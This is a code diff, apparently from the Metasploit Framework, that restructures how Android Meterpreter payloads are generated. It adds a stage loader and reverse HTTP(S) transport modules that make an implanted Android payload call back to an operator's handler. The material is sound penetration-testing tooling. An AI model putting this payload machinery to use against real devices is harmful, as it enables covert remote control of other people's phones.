Rework android structure to function with the multi arch payload

Author: OJ

lib/msf/base/sessions/meterpreter_multi.rb

@@ -26,6 +26,9 @@ def self.create_session(rstream, opts={})
     when 'java'
       require 'msf/base/sessions/meterpreter_java'
       return Msf::Sessions::Meterpreter_Java_Java.new(rstream, opts)
+    when 'android'
+      require 'msf/base/sessions/meterpreter_android'
+      return Msf::Sessions::Meterpreter_Java_Android.new(rstream, opts)
     when 'php'
       require 'msf/base/sessions/meterpreter_php'
       return Msf::Sessions::Meterpreter_Php_Java.new(rstream, opts)

lib/msf/core/payload/android.rb

@@ -24,41 +24,41 @@ def fix_dex_header(dexfile)
   # We could compile the .class files with dx here
   #
   def generate_stage(opts={})
+    ''
+  end
+
+  def generate_default_stage(opts={})
+    ''
   end
 
   #
   # Used by stagers to construct the payload jar file as a String
   #
-  def generate
-    generate_jar.pack
+  def generate(opts={})
+    generate_jar(opts).pack
   end
 
   def java_string(str)
     [str.length].pack("N") + str
   end
 
-  def apply_options(classes, opts)
-    config = generate_config_bytes(opts)
-    if opts[:stageless]
-      config[0] = "\x01"
-    end
-
-    string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
-  end
-
-  def generate_config_bytes(opts={})
+  def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
 
     config_opts = {
       ascii_str:  true,
       arch:       opts[:uuid].arch,
-      expiration: datastore['SessionExpirationTimeout'].to_i,
+      expiration: ds['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
       transports: [transport_config(opts)]
     }
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-    config.to_b
+    result = config.to_b
+
+    result[0] = "\x01" if opts[:stageless]
+    result
   end
 
   def string_sub(data, placeholder="", input="")
@@ -104,7 +104,8 @@ def generate_jar(opts={})
       classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     end
 
-    apply_options(classes, opts)
+    config = generate_config(opts)
+    string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
 
     jar = Rex::Zip::Jar.new
     files = [

lib/msf/core/payload/android/meterpreter_loader.rb

@@ -0,0 +1,79 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Common loader for Android payloads that make use of Meterpreter.
+#
+###
+
+module Payload::Android::MeterpreterLoader
+
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Android Meterpreter & Configuration',
+      'Description'   => 'Android-specific meterpreter generation',
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'PayloadCompat' => {'Convention' => 'http https'},
+      'Stage'         => {'Payload' => ''}
+    ))
+
+    register_options([
+      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
+    ])
+  end
+
+  def stage_payload(opts={})
+    stage_meterpreter(opts)
+  end
+
+  def stage_meterpreter(opts={})
+    clazz = 'androidpayload.stage.Meterpreter'
+    metstage = MetasploitPayloads.read("android", "metstage.jar")
+    met = MetasploitPayloads.read("android", "meterpreter.jar")
+
+    # Name of the class to load from the stage, the actual jar to load
+    # it from, and then finally the meterpreter stage
+    blocks = [
+      java_string(clazz),
+      java_string(metstage),
+      java_string(met),
+      java_string(generate_config(opts))
+    ]
+
+    (blocks + [blocks.length]).pack('A*' * blocks.length + 'N')
+  end
+
+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: ds['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: opts[:transport_config] || [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the XML version of it
+    config.to_b
+  end
+end
+end
+

lib/msf/core/payload/android/reverse_http.rb

@@ -0,0 +1,63 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Complex payload generation for Android that speaks HTTP(S)
+#
+###
+
+module Payload::Android::ReverseHttp
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def generate_config(opts={})
+    opts[:uri] ||= generate_uri(opts)
+    super(opts)
+  end
+
+  #
+  # Generate the URI for the initial stager
+  #
+  def generate_uri(opts={})
+    ds = opts[:datastore] || datastore
+    uri_req_len = ds['StagerURILength'].to_i
+
+    # Choose a random URI length between 30 and 255 bytes
+    if uri_req_len == 0
+      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    end
+
+    if uri_req_len < 5
+      raise ArgumentError, "Minimum StagerURILength is 5"
+    end
+
+    generate_uri_uuid_mode(:init_java, uri_req_len)
+  end
+
+  #
+  # Always wait at least 20 seconds for this payload (due to staging delays)
+  #
+  def wfs_delay
+    20
+  end
+
+end
+
+end
+
+

lib/msf/core/payload/android/reverse_https.rb

@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/android/reverse_http'
+
+module Msf
+
+###
+#
+# Complex payload generation for Android that speaks HTTPS
+#
+###
+
+module Payload::Android::ReverseHttps
+
+  include Msf::Payload::Android::ReverseHttp
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_https(opts)
+  end
+
+end
+end
+

lib/msf/core/payload/java/meterpreter_loader.rb

@@ -20,12 +20,12 @@ module Payload::Java::MeterpreterLoader
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'          => 'Meterpreter & Configuration',
+      'Name'          => 'Java Meterpreter & Configuration',
       'Description'   => 'Java-specific meterpreter generation',
       'Author'        => ['OJ Reeves'],
       'Platform'      => 'java',
       'Arch'          => ARCH_JAVA,
-      'PayloadCompat' => {'Convention' => 'http'},
+      'PayloadCompat' => {'Convention' => 'http https'},
       'Stage'         => {'Payload' => ''}
       ))
   end

modules/payloads/stagers/android/reverse_http.rb

@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
+require 'msf/core/payload/android/reverse_http'
 require 'msf/core/payload/uuid/options'
 
 module MetasploitModule
@@ -13,6 +14,7 @@ module MetasploitModule
 
   include Msf::Payload::Stager
   include Msf::Payload::Android
+  include Msf::Payload::Android::ReverseHttp
   include Msf::Payload::UUID::Options
 
   def initialize(info = {})
@@ -24,21 +26,8 @@ def initialize(info = {})
       'Platform'    => 'android',
       'Arch'        => ARCH_DALVIK,
       'Handler'     => Msf::Handler::ReverseHttp,
+      'Convention'  => 'javaurl',
       'Stager'      => {'Payload' => ''}
     ))
   end
-
-  #
-  # Generate the transport-specific configuration
-  #
-  def transport_config(opts={})
-    transport_config_reverse_http(opts)
-  end
-
-  def generate_config_bytes(opts={})
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    opts[:uri] = generate_uri_uuid_mode(:init_java, uri_req_len)
-    super(opts)
-  end
-
 end

modules/payloads/stagers/android/reverse_https.rb

@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_https'
+require 'msf/core/payload/android/reverse_https'
 require 'msf/core/payload/uuid/options'
 
 module MetasploitModule
@@ -13,7 +14,7 @@ module MetasploitModule
 
   include Msf::Payload::Stager
   include Msf::Payload::Android
-  include Msf::Payload::UUID::Options
+  include Msf::Payload::Android::ReverseHttps
 
   def initialize(info = {})
     super(merge_info(info,
@@ -27,18 +28,4 @@ def initialize(info = {})
       'Stager'      => {'Payload' => ''}
     ))
   end
-
-  #
-  # Generate the transport-specific configuration
-  #
-  def transport_config(opts={})
-    transport_config_reverse_https(opts)
-  end
-
-  def generate_config_bytes(opts={})
-    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
-    opts[:uri] = generate_uri_uuid_mode(:init_java, uri_req_len)
-    super(opts)
-  end
-
 end